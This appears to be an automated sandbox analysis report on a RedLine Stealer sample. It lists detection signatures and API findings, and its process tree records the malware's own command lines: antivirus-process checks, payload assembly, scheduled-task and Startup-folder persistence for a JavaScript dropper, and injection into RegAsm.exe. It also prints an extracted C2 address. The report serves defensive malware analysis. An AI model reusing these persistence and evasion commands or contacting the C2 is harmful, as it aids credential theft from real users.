Edit tour

Windows Analysis Report
e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Overview

General Information

Sample name:	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe
Analysis ID:	1502159
MD5:	db2a12edc73769f2f2b6b01545afe2c3
SHA1:	73dc44fb0753296f51b851299f468031ceb77b54
SHA256:	e6db7d34b498982601b2c45ac5b2a1c1b9502e502514ccffae9862f2aa719f42
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected RedLine Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe" MD5: DB2A12EDC73769F2F2B6B01545AFE2C3)

cmd.exe (PID: 7344 cmdline: "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7396 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7404 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7440 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7448 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7492 cmdline: cmd /c md 684126 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7508 cmdline: findstr /V "VegetablesIndividualBindingGba" Ever MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7524 cmdline: cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Intake.pif (PID: 7544 cmdline: Intake.pif C MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cmd.exe (PID: 7580 cmdline: cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7628 cmdline: schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7644 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & echo URL="C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5460 cmdline: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 1060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6588 cmdline: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6612 cmdline: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7560 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 7692 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

TurtleHarbor.pif (PID: 7732 cmdline: "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

wscript.exe (PID: 7836 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

TurtleHarbor.pif (PID: 7876 cmdline: "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif" "C:\Users\user\AppData\Local\SecureData Technologies\Y" MD5: 18CE19B57F43CE0A5AF149C96AECC685)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.200.149.147:27667"], "Bot Id": "button1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: RegAsm.exe PID: 5460	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, ParentCommandLine: Intake.pif C, ParentImage: C:\Users\user\AppData\Local\Temp\684126\Intake.pif, ParentProcessId: 7544, ParentProcessName: Intake.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, ProcessId: 5460, ProcessName: RegAsm.exe

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Additionally" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js'" /sc minute /mo 5 /F, ProcessId: 7628, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", ProcessId: 7692, ProcessName: wscript.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: Intake.pif C, CommandLine: Intake.pif C, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\684126\Intake.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\684126\Intake.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\684126\Intake.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7344, ParentProcessName: cmd.exe, ProcessCommandLine: Intake.pif C, ProcessId: 7544, ProcessName: Intake.pif

Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, ParentCommandLine: Intake.pif C, ParentImage: C:\Users\user\AppData\Local\Temp\684126\Intake.pif, ParentProcessId: 7544, ParentProcessName: Intake.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\684126\RegAsm.exe, ProcessId: 5460, ProcessName: RegAsm.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.js", ProcessId: 7692, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TurtleHarbor.url

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 26.2.RegAsm.exe.1100000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.200.149.147:27667"], "Bot Id": "button1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Virustotal: Detection: 8%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\684126\Intake.pif	Virustotal: Detection: 8%			Perma Link

Multi AV Scanner detection for submitted file

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	ReversingLabs: Detection: 39%
Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Virustotal: Detection: 35%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 0000001A.00000000.3138021219.0000000000CC2000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.3138021219.0000000000CC2000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr

Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00405B98 FindFirstFileW,FindClose,	0_2_00405B98
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406559
Source: C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	Code function: 0_2_004029F1 FindFirstFileW,	0_2_004029F1
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00374005
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0037C2FF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0037494A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037CD14 FindFirstFileW,FindClose,	18_2_0037CD14
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	18_2_0037CD9F
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0037F5D8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0037F735
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	18_2_0037FA36
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 18_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_00373CE2
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00374005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00374005
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037C2FF
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037494A GetFileAttributesW,FindFirstFileW,FindClose,	20_2_0037494A
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037CD14 FindFirstFileW,FindClose,	20_2_0037CD14
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	20_2_0037CD9F
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F5D8
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_0037F735
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_0037FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	20_2_0037FA36
Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif	Code function: 20_2_00373CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00373CE2

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\684126\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\684126	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 45.200.149.147:27667

Source: unknown

DNS traffic detected: query: CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN replaycode: Name error (3)

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\SecureData Technologies\TurtleHarbor.pif

Code function: 18_2_003829BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

18_2_003829BA

Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003107000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003107000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003107000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000001A.00000002.3204845308.0000000003107000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3855499519.00000000028E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,^q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: CvcMEMMQKdoWtsiZdkN.CvcMEMMQKdoWtsiZdkN

Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Intake.pif, 0000000A.00000003.1676899367.0000000003736000.00000004.00000800.00020000.00000000.sdmp, Intake.pif, 0000000A.00000000.1669006674.0000000000E99000.00000002.00000001.01000000.00000005.sdmp, TurtleHarbor.pif, 00000012.00000000.1688045792.00000000003D9000.00000002.00000001.01000000.00000008.sdmp, TurtleHarbor.pif, 00000014.00000000.1798912259.00000000003D9000.00000002.00000001.01000000.00000008.sdmp, Nevertheless.0.dr, TurtleHarbor.pif.10.dr, Intake.pif.1.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RegAsm.exe, 0000001A.00000002.3208069125.0000000007282000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
